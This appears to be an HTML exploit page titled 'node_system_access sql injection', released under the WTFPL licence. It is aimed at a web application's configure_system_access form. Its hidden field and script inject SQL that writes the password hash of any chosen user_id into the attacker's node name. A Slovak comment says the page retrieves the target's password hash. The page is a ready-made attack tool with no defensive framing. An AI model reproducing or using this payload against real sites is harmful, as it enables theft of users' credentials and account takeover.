2 This program is free software. It comes without any warranty, to
3 the extent permitted by applicable law. You can redistribute it
4 and/or modify it under the terms of the Do What The Fuck You Want
5 To Public License, Version 2, as published by Sam Hocevar. See
6 http://sam.zoy.org/wtfpl/COPYING for more details.
11 <title>node_system_access sql injection</title>
12 <meta http-equiv="Cache-Control" content="Public">
13 <meta http-equiv="Content-Type" content="text/html; charset=windows-1250">
14 <link rel="shortcut icon" href="/id/1459933/download">
15 <link rel='stylesheet' type='text/css' href='/id/1126515/download'>
19 <script type="text/javascript">
20 function access_node_system(what)
22 var id = document.getElementById('user_id').value;
24 document.getElementById('node_system_access').value = "public', node_name=(select password from users where user_id='"+id+"'), node_parent='";
29 nastavi tvoj system_access na 'public', tvoj node_name na hash of desired id's pwd a tvojho parenta na ''
31 <noscript>javascript not enabled, user_id defaults to {$user_id}</noscript>
32 <form method="post" enctype="multipart/form-data" action="/id/{$user_id}/">
33 <input type="hidden" name="node_system_access" id="node_system_access" value="public', node_name=(select password from users where user_id='{$user_id}'), node_parent='">
34 <input type="hidden" name="event" value="configure_system_access">
35 <script type="text/javascript">
36 document.write("<input type="text" size="7" name="user_id" id="user_id" value="{$user_id}">");
38 <input type="submit" value="get_pwd_hash" onclick="access_node_system(this);return false">